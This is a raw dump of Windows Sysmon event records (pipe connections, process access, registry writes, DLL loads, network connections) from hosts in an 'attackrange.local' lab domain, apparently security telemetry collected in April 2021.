14:58:07.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078240Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078239Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078238Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.107{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000078237Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.092{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-240E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078236Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.076{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-240E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078235Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.076{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFF-607E-240E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078234Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078233Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078232Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078231Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:07.060{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000078230Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.045{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BIT75AA.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000078229Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.014{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBFF-607E-230E-00000000BB01}5920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000078228Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.014{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBFF-607E-230E-00000000BB01}5920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000078227Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.014{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EBFF-607E-230E-00000000BB01}5920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050485Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:07.806{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C27EB8A9AF89845F328029B055D0C19,SHA256=5A533D6942855245A4D8B45966DA8FD0403C3140FAE9DEFCC947ED3B5C66C8D5,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000050484Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000050483Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00cb75b1) 13241300x800000000000000050482Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ed-0x309d2b1f) 13241300x800000000000000050481Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f5-0x9261931f) 13241300x800000000000000050480Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0xf425fb1f) 13241300x800000000000000050479Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000050478Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00cb75b1) 13241300x800000000000000050477Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d735ed-0x309d2b1f) 13241300x800000000000000050476Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d735f5-0x9261931f) 13241300x800000000000000050475Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-SetValue2021-04-20 14:58:07.634{85C0FFC9-B7EC-607E-0B00-00000000BB01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d735fd-0xf425fb1f) 23542300x800000000000000050474Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:07.337{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2EB1A76B3409679DAC422F9393466FD,SHA256=ED7C12A78E3CA52207358F50A2D84E4C7639FBD71142E9E227A1EE2DEEA189F0,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000078564Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078563Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078562Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.982{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078561Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.920{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ipcfile.dll2021-04-20 14:58:08.920 11241100x800000000000000078560Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.920{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:58:08.920 18141800x800000000000000078559Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078558Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.920{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.920{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-debug-l1-1-0.dll2021-04-20 14:58:08.795 18141800x800000000000000078554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.795{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.764{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-datetime-l1-1-0.dll2021-04-20 14:58:08.764 11241100x800000000000000078552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.764{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-sysinfo-l1-1-0.dll2021-04-20 14:58:08.764 18141800x800000000000000078551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.764{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.748{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-console-l1-1-0.dll2021-04-20 14:58:08.748 11241100x800000000000000078547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.732{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:58:08.732 18141800x800000000000000078546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.732{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.717{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\api-ms-win-core-synch-l1-1-0.dll2021-04-20 14:58:08.717 18141800x800000000000000078542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 11241100x800000000000000078540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:08.717{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\adal.dll2021-04-20 14:58:08.717 18141800x800000000000000078539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.717{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.701{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.701{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 354300x800000000000000078536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.190{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57550-false10.0.1.12-8000- 354300x800000000000000078535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.064{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57549-false104.75.89.62a104-75-89-62.deploy.static.akamaitechnologies.com443https 354300x800000000000000078534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:07.056{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local55105- 354300x800000000000000078533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.976{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57548-false52.142.114.176-443https 354300x800000000000000078532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.941{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com63662-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000078531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:06.355{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft Office\root\Integration\Integrator.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57547-false52.114.75.150-443https 10341000x800000000000000078530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:08.654{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC00-607E-330E-00000000BB01}1828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 18141800x800000000000000078529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000078524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:08.654{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 